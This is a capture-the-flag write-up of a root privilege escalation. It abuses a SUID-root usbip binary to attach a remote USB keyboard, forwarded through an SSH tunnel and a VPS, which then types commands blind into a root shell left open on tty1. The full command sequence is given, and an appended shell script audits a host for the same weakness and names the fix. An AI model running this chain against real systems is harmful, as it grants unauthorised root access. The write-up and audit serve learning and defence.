Tags: misc net privesc usb 


Hi, a small write-up despite the lack of time to validate this chall.
The goal is to find a privilege escalation as root to get the flag in /flag.
I summarize the reconnaissance phase, which is complicated by the timeout.

Search for suid binaries
find / -user root -perm -u=s 2>/dev/null
usbip lets you share USB devices between computers with their full functionality; a SUID-root copy of it seems a good candidate...

Look at the active processes
ps -edf
root 1 0 14 21:19 ? 00:00:06 /sbin/init
root 2 0 0 21:19 ? 00:00:00 [kthreadd]
root 127 1 1 21:19 ttyS0 00:00:00 /bin/login -f
root 142 123 1 21:19 tty1 00:00:00 -bash
user 143 127 1 21:19 ttyS0 00:00:00 -bash
user 148 143 0 21:20 ttyS0 00:00:00 ps -edf
We notice that root is logged in on tty1 while our session is on ttyS0.

We have all the necessary information: the idea is to attach a remote USB keyboard with the SUID-root usbip binary. Its keystrokes land in root's shell on tty1, so we type commands blind and redirect their output to our tty, /dev/ttyS0.

Requirements:
* an additional keyboard
* a vps

Open an ssh remote forward tunnel from the default usbip port (3240) between your computer and your vps.
Make sure that the "GatewayPorts yes" option is enabled in the vps sshd_config.
ssh user@<vps-ip> -R 3240:localhost:3240

Install the usbip tools on your computer
sudo apt install usbip

Load the necessary kernel modules on your computer and start usbipd
sudo modprobe usbip-host
sudo modprobe usbip-core
sudo usbipd -D

Now plug the additional keyboard into your computer.

Find the bus id of the new keyboard
sudo usbip list -l # e.g. 1-7

Bind the bus id on your computer (don't touch the new keyboard or the link will go down)
sudo usbip --debug bind -b 1-7
usbip: debug: usbip.c:141:[run_command] running command: `bind'
usbip: info: bind device on busid 1-7: complete

On the chall, attach the remote keyboard and display the contents of /dev/ttyS0
/sbin/usbip attach -r <vps-ip> -b 1-7&
cat /dev/ttyS0

Now, you can blindly launch commands with the remote keyboard (beware of the timeout, you have to be fast ;) )
ls /flag > /dev/ttyS0
cat /flag/flag.txt > /dev/ttyS0
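For the defender's side, an added example (not part of the original write-up) that audits a host for the three conditions this chain relies on: a SUID usbip tool, a root shell left on a virtual console, and the usbip client driver being loaded. The find/ps/lsmod sample lines are constructed, and vhci_hcd as the name of the client-side usbip module is an assumption.

```shell
#!/bin/sh
# Constructed sample output (find / ps -edf / lsmod), not captured from the challenge
# box, so the checks run offline. vhci_hcd as the client-side usbip module is an assumption.
SAMPLE_SUID='/usr/bin/passwd
/usr/bin/sudo
/sbin/usbip'
SAMPLE_PS='root 1 0 14 21:19 ? 00:00:06 /sbin/init
root 127 1 1 21:19 ttyS0 00:00:00 /bin/login -f
root 142 123 1 21:19 tty1 00:00:00 -bash
user 143 127 1 21:19 ttyS0 00:00:00 -bash'
SAMPLE_LSMOD='vhci_hcd 32768 0
usbip_core 28672 1 vhci_hcd'

# SUID binaries whose basename is a usbip tool (usbip, usbipd, ...): with one of these,
# an unprivileged user can attach arbitrary remote USB devices, HID keyboards included.
suid_usbip() { printf '%s\n' "$1" | grep -E '/usbip[a-z_-]*$' || true; }

# Interactive shells owned by root on a virtual console (ps -edf: TTY is $6, CMD is $8).
# A USB keyboard attached to the box types into whatever is on the active console.
root_tty_shells() {
  printf '%s\n' "$1" | awk '$1 == "root" && $6 ~ /^tty[0-9]/ && $8 ~ /(^|\/)-?(ba|da|z|k)?sh$/ { print $6 }'
}

# Exit 0 when the usbip client driver is loaded, 1 otherwise.
vhci_loaded() { printf '%s\n' "$1" | awk '$1 == "vhci_hcd" { f = 1 } END { exit !f }'; }

# Combine the three checks; return 1 when the full usbip-to-root-console chain is open.
audit() {
  suid=$(suid_usbip "$1"); shells=$(root_tty_shells "$2")
  [ -n "$suid" ]   && echo "SUID usbip tool(s): $(echo "$suid" | tr '\n' ' ')"
  [ -n "$shells" ] && echo "root shell on console: $(echo "$shells" | tr '\n' ' ')"
  vhci_loaded "$3" && echo "vhci_hcd loaded: remote USB attach needs no modprobe"
  [ -n "$suid" ] && [ -n "$shells" ] && { echo "RISK: usbip-to-root-tty chain is open"; return 1; }
  return 0
}

# Run against the constructed sample, or against the live host with --live.
if [ "$1" = "--live" ]; then
  audit "$(find / -perm -4000 -type f 2>/dev/null)" "$(ps -edf)" "$(lsmod)"
else
  audit "$SAMPLE_SUID" "$SAMPLE_PS" "$SAMPLE_LSMOD"
fi
```

The fix on the audited side is the usual one: drop the SUID bit from usbip (or remove the tool), and don't leave root shells logged in on consoles.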